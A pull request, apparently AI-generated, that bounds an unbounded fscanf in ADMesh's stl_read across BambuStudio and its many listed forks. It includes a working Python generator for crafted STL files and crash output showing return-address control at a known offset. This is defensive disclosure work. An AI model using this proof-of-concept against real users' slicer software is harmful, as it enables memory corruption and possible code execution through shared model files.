### PR TITLE
Fix stack buffer overflow in ADMesh stl_read (unbounded fscanf of solid name)

### DIFF
--- a/src/admesh/stlinit.cpp
+++ b/src/admesh/stlinit.cpp
@@ -166,7 +166,7 @@ static bool stl_read(stl_file *stl, FILE *fp, int first_facet, bool first, Impor
         rewind(fp);
         try{
             char solid_content[256];
-            int res_solid = fscanf(fp, " solid %[^\n]", solid_content);
+            int res_solid = fscanf(fp, " solid %255[^\n]", solid_content);
             if (res_solid == 1) {
                 /*include ml info*/
                 std::string ext_content(solid_content);


### PR DESCRIPTION
# Fix stack buffer overflow in ADMesh `stl_read()` — unbounded `fscanf` of the ASCII-STL solid name

## Summary

`stl_read()` copies the ASCII-STL `solid` name into a fixed **256-byte stack buffer** using an `fscanf` scanset **with no field width**, so a `solid` name longer than 255 bytes overruns `solid_content[256]` and the adjacent saved stack state, including the **saved return address**. The path is reached simply by opening (or drag-and-dropping) any `.stl` file, so a single crafted model file is fully attacker-controlled input.

This report is scoped **only** to that buffer overflow.

## Vulnerable code

`src/admesh/stlinit.cpp` (current `master`, lines 168–169):

```c
char solid_content[256];
int res_solid = fscanf(fp, " solid %[^\n]", solid_content);   // <-- no field width
```

An ASCII STL begins with `solid <name>\n`. The `%[^\n]` conversion copies `<name>` up to the newline into `solid_content` with no bound; a `<name>` longer than 255 bytes writes past the buffer.

The upstream-safe form (Slic3r / PrusaSlicer / ADMesh proper) discards the name with an assignment-suppressed, buffer-less conversion:

```c
fscanf(fp, " solid%*[^\n]\n");   // '*' = parse and discard, no destination buffer
```

The vulnerable capturing form was introduced in this repository by commit `54eed41661b5aeb114f827b67328efcfac4bd07b` ("NEW:tracking stl model files", 2023-11-23).

## Impact

- **Memory corruption on file open.** Opening a `.stl` whose `solid` name exceeds 255 bytes overflows a stack buffer and overwrites the saved return address with attacker-controlled bytes (evidence below) — **instruction-pointer control**.
- **No Pointer Authentication on the shipped macOS build.** The distributed binary’s `arm64` slice is plain `arm64` (not `arm64e`), so the saved return address is a raw, directly-usable code pointer.
- **Trivially reachable.** No user interaction beyond opening the file; STL is a routine format users constantly open and receive from third parties (marketplaces, shared projects, print farms).

### Who is affected (downstream forks)

Because this lives in the vendored ADMesh loader, every fork that inherited it is affected. Verified at each project’s current default-branch source — the unbounded `fscanf(fp, " solid %[^\n]", …)` into a 256-byte buffer is present at HEAD in all of these:

- **BambuStudio** (this repo) — root of the change.
- **OrcaSlicer** (`SoftFever/OrcaSlicer`) — inherited 2023-12-01, plus its downstream vendor forks:
  - FlashForge — `FlashForge/Orca-Flashforge`
  - Elegoo — `elegooofficial/ElegooSlicer`, `ELEGOO-3D/OrcaSlicer_PR`
  - Anycubic — `ANYCUBIC-3D/AnycubicSlicerNext`
  - Mingda — `Mingda-tech/MingDa_OrcaSlicer`
  - Pantheon — `Pantheon-Design/PantheonSlicer-3`
  - Xunda — `Xunda3D/XundaSlicer`
  - Dremel — `dremel-digilab/Dremel-Slicer`
  - IdeaFormer — `Bell-Technology/IdeaFormer`
  - Adartys — `adartys-3DSolutions/Adartys-Slicer`
  - Snapmaker — `2006benny/SnapmakerOrca`
- **QIDIStudio** (`QIDITECH/QIDIStudio`) — forked BambuStudio directly.

A GitHub commit-hash search finds the exact vulnerable commit in **~83 repositories** (history-preserving forks only; rebased/squashed and private forks are additional). Fixing it here lets the whole tree pull the fix.

## Proof — return address in control

Reproducer generator:

```python
#!/usr/bin/env python3
# make_overflow_stl.py -- reproducer for the stl_read() solid-name overflow.
import sys
_FACET=("facet normal 0 0 0\n outer loop\n"
        "  vertex 0 0 0\n  vertex 1 0 0\n  vertex 0 1 0\n endloop\nendfacet\n")
def de_bruijn(n=4, alphabet=("abcdefghijklmnopqrstuvwxyz"
             "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"), length=None):
    k=len(alphabet); a=[0]*k*n; seq=[]
    def db(t,p):
        if t>n:
            if n%p==0: seq.extend(a[1:p+1])
        else:
            a[t]=a[t-p]; db(t+1,p)
            for j in range(a[t-p]+1,k): a[t]=j; db(t+1,t)
    db(1,1); s="".join(alphabet[i] for i in seq)
    if length:
        while len(s)<length: s+=s
        s=s[:length]
    return s
def write_stl(path,name):
    open(path,"w").write("solid "+name+"\n"+_FACET+"endsolid\n")
    print("wrote",path,"solid name =",len(name),"bytes")
if __name__=="__main__":
    cmd=sys.argv[1] if len(sys.argv)>1 else "plain"
    n=int(sys.argv[2]) if len(sys.argv)>2 else (20000 if cmd=="plain" else 1200)
    write_stl("poc_solid_overflow.stl","A"*n) if cmd=="plain" \
        else write_stl("poc_solid_cyclic.stl", de_bruijn(length=n))
```

Run `python3 make_overflow_stl.py cyclic 1200`, open the resulting `.stl`, and read the crash report’s own backtrace:

```
Exception Type:  EXC_BAD_ACCESS (SIGSEGV)
Thread 0 Crashed:
  0  <app>  stl_open(...)+…            ; still inside the ADMesh load
  1  <app>  0x0000614762616146         ; FRAME #1 SAVED RETURN ADDRESS

  0x0000614762616146  ->  bytes "F a a b G a"  ->  De Bruijn offset 368
```

So the overflow places attacker-controlled bytes into the saved return address at **solid-name offset 368**. With a plain 20000×`'A'` name (`make_overflow_stl.py plain`) the same slot reads `0x414141414141`.

| solid-name offset | overwritten slot | consequence |
|---|---|---|
| 368 | saved return address (frame #1) | instruction-pointer control (no PAC) |

## Suggested fix

Bound the scanset with a field width so at most 255 bytes plus the NUL terminator are written:

```diff
-            int res_solid = fscanf(fp, " solid %[^\n]", solid_content);
+            int res_solid = fscanf(fp, " solid %255[^\n]", solid_content);
```

`%255[^\n]` preserves the existing behavior (the name is still read) while making it impossible to overflow `solid_content[256]`. This PR applies exactly that change.

As general hardening, every `%s`/`%[` scanset targeting a fixed buffer in this file should carry an explicit maximum field width; the assignment-suppressed `%*[^\n]` is appropriate anywhere the value is not needed.

🤖 Generated with [Claude Code](https://claude.com/claude-code)
